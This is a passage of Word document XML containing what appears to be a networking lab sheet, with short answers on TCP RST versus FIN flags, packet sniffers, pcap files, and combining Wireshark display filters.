            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4E3BE178" w14:textId="77777777" w:rsidR="00EF04B3" w:rsidRPr="001C411D" w:rsidRDefault="00EF04B3" w:rsidP="00DE6919">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6A45925B" w14:textId="77777777" w:rsidR="00EF04B3" w:rsidRPr="001C411D" w:rsidRDefault="00EF04B3" w:rsidP="00DE6919">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EF04B3" w:rsidRPr="001C411D" w14:paraId="1231F067" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="319"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9829" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="211B0F23" w14:textId="77777777" w:rsidR="00EF04B3" w:rsidRPr="001C411D" w:rsidRDefault="00EF04B3"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26207F91" w14:textId="77777777" w:rsidR="00EF04B3" w:rsidRPr="001C411D" w:rsidRDefault="00EF04B3" w:rsidP="00DE6919">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="47CAACF3" w14:textId="77777777" w:rsidR="00EF04B3" w:rsidRPr="001C411D" w:rsidRDefault="00EF04B3" w:rsidP="00CF046C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="15"/>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Differentiate between RST and FIN flag.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FF9C1CC" w14:textId="36D9C9D2" w:rsidR="009111A4" w:rsidRPr="001C411D" w:rsidRDefault="009111A4" w:rsidP="009111A4">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>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RST (Reset) and FIN (Finish) are both TCP (Transmission Control Protocol) flags used to terminate a connection, but they are used in different ways. RST is used to abruptly terminate a connection, often in response to a serious network problem or an attack, while FIN is used to signal a graceful termination of a connection. When a FIN flag is sent, it </w:t>
            </w:r>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>indicates that the sender has no more data to send, but is willing to receive data. When the receiving party acknowledges the FIN, it sends its own FIN to signal that it also has no more data to send, thus closing the connection.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="611FCE9F" w14:textId="77777777" w:rsidR="009111A4" w:rsidRPr="001C411D" w:rsidRDefault="009111A4" w:rsidP="009111A4">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4559C6DC" w14:textId="77777777" w:rsidR="00EF04B3" w:rsidRPr="001C411D" w:rsidRDefault="00EF04B3" w:rsidP="00CF046C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="15"/>
              </w:numPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>What information can be retrieved from a sniffer?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C0A9063" w14:textId="61DA7A86" w:rsidR="009111A4" w:rsidRPr="001C411D" w:rsidRDefault="009111A4" w:rsidP="009111A4">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>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A sniffer is a network tool that can capture and </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>analyze</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> network traffic. It can retrieve various types of information from the captured traffic, such as source and destination IP addresses, protocol types, packet size, packet content, etc. Sniffers can also detect and </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>analyze</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> network problems, such as packet loss, delays, and bandwidth issues. They can be used for debugging, troubleshooting, security auditing, and performance analysis of networked applications.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00D036F1" w14:textId="77777777" w:rsidR="009111A4" w:rsidRPr="001C411D" w:rsidRDefault="009111A4" w:rsidP="009111A4">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="202EC4EF" w14:textId="159B45C4" w:rsidR="00EF04B3" w:rsidRPr="001C411D" w:rsidRDefault="00EF04B3" w:rsidP="00CF046C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="15"/>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Is Wireshark an active or passive network scanning tool and why?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F671B39" w14:textId="0B7E2119" w:rsidR="009111A4" w:rsidRPr="001C411D" w:rsidRDefault="009111A4" w:rsidP="009111A4">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>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Wireshark is a passive network scanning tool. It captures and </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>analyzes</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> network traffic without actively sending any packets on the network. It operates by capturing packets that are already flowing on the network and then </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>analyzing</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> them. Passive tools are preferred over active tools in most cases because they do not interfere with the network or the devices on it, which can cause disruptions or even network failures.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="270A547D" w14:textId="77777777" w:rsidR="009111A4" w:rsidRPr="001C411D" w:rsidRDefault="009111A4" w:rsidP="009111A4">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3D45C497" w14:textId="00C88105" w:rsidR="00EF04B3" w:rsidRPr="001C411D" w:rsidRDefault="00EF04B3" w:rsidP="00CF046C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="15"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve">What is a </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>pcap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> file?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="764705B5" w14:textId="2BC8F3A3" w:rsidR="009111A4" w:rsidRPr="001C411D" w:rsidRDefault="009111A4" w:rsidP="009111A4">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>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 xml:space="preserve">A </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>pcap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> (packet capture) file is a file format used to store network packets captured by a sniffer or a network </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>analyzer</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Pcap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> files can be read and </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>analyzed</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> by various network tools, such as Wireshark, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>tcpdump</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>, and Snort. They are useful for troubleshooting, network analysis, security auditing, and forensics.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1EAD0CFF" w14:textId="77777777" w:rsidR="009111A4" w:rsidRPr="001C411D" w:rsidRDefault="009111A4" w:rsidP="009111A4">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5AA42E90" w14:textId="77777777" w:rsidR="00EF04B3" w:rsidRPr="001C411D" w:rsidRDefault="00EF04B3" w:rsidP="00CF046C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="15"/>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How to combine filters in Wireshark </w:t>
            </w:r>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>to check the traffic from a particular IP and for http then.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="616B1285" w14:textId="77777777" w:rsidR="009111A4" w:rsidRPr="001C411D" w:rsidRDefault="009111A4" w:rsidP="009111A4">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>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To combine filters in Wireshark to check the traffic from a particular IP and for HTTP, you can use the following steps:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BD870C3" w14:textId="77777777" w:rsidR="009111A4" w:rsidRPr="001C411D" w:rsidRDefault="009111A4" w:rsidP="00CF046C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="30"/>
              </w:numPr>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Launch Wireshark and start capturing traffic.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="496AC84C" w14:textId="77777777" w:rsidR="009111A4" w:rsidRPr="001C411D" w:rsidRDefault="009111A4" w:rsidP="00CF046C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="30"/>
              </w:numPr>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In the filter toolbar, type in the filter "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>ip.addr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> == [IP address]" where [IP address] is the IP address you want to filter traffic from. For example, if you want to filter traffic from the IP address 192.168.1.1, the filter would be "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>ip.addr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> == 192.168.1.1".</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2092F530" w14:textId="77777777" w:rsidR="009111A4" w:rsidRPr="001C411D" w:rsidRDefault="009111A4" w:rsidP="00CF046C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="30"/>
              </w:numPr>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Press enter to apply the filter. Now, Wireshark will only display traffic from the specified IP address.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40D4E34B" w14:textId="77777777" w:rsidR="009111A4" w:rsidRPr="001C411D" w:rsidRDefault="009111A4" w:rsidP="00CF046C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="30"/>
              </w:numPr>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To further filter the traffic to only show HTTP traffic, type in the filter "http" in the filter toolbar and press enter.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42207835" w14:textId="77777777" w:rsidR="009111A4" w:rsidRPr="001C411D" w:rsidRDefault="009111A4" w:rsidP="00CF046C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="30"/>
              </w:numPr>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Now, Wireshark will only display HTTP traffic from the specified IP address.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0AF7F9F1" w14:textId="72B0596D" w:rsidR="009111A4" w:rsidRPr="001C411D" w:rsidRDefault="009111A4" w:rsidP="009111A4">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>You can also combine the two filters into one by typing in "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>ip.addr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> == [IP address] &amp;&amp; http" in the filter toolbar and pressing enter. This will display only HTTP traffic from the specified IP address.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38939E70" w14:textId="6FD85E3D" w:rsidR="009111A4" w:rsidRPr="001C411D" w:rsidRDefault="009111A4" w:rsidP="009111A4">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="011845DD" w14:textId="42B4D6EE" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="00A90352" w:rsidP="00A9035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1B3CE097" w14:textId="77777777"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388AD2C7" w14:textId="4B6575D8" w:rsidR="00C143A9" w:rsidRPr="001C411D" w:rsidRDefault="00562633" w:rsidP="00A90352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FA18C19" wp14:editId="187E3B5E">
            <wp:extent cx="5943600" cy="3180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00C143A9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57DB52A1" wp14:editId="2F32D015">
            <wp:extent cx="5943600" cy="318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20E380C" w14:textId="532DC59C" w:rsidR="00562633" w:rsidRPr="001C411D" w:rsidRDefault="00562633" w:rsidP="00A90352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="066EED94" wp14:editId="12B13B8F">
            <wp:extent cx="5943600" cy="318071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1C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="586AABD6" wp14:editId="29CF3140">
            <wp:extent cx="5943600" cy="3180715"/>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476E99DF" w14:textId="7911E430" w:rsidR="00562633" w:rsidRPr="001C411D" w:rsidRDefault="00562633" w:rsidP="00A90352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E6C0005" wp14:editId="61D7280A">
            <wp:extent cx="5943600" cy="3180715"/>
            <wp:effectExtent l="0" t="0" r="0" b="63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DE92B6B" w14:textId="553387A1" w:rsidR="00562633" w:rsidRPr="001C411D" w:rsidRDefault="00562633" w:rsidP="00A90352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34E70A93" wp14:editId="4B9B898C">
            <wp:extent cx="5943600" cy="3180715"/>
            <wp:effectExtent l="0" t="0" r="0" b="63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3B64FFC" w14:textId="24272C46" w:rsidR="00562633" w:rsidRPr="001C411D" w:rsidRDefault="00562633" w:rsidP="00A90352">
      <w:pPr>
        <w:rPr>
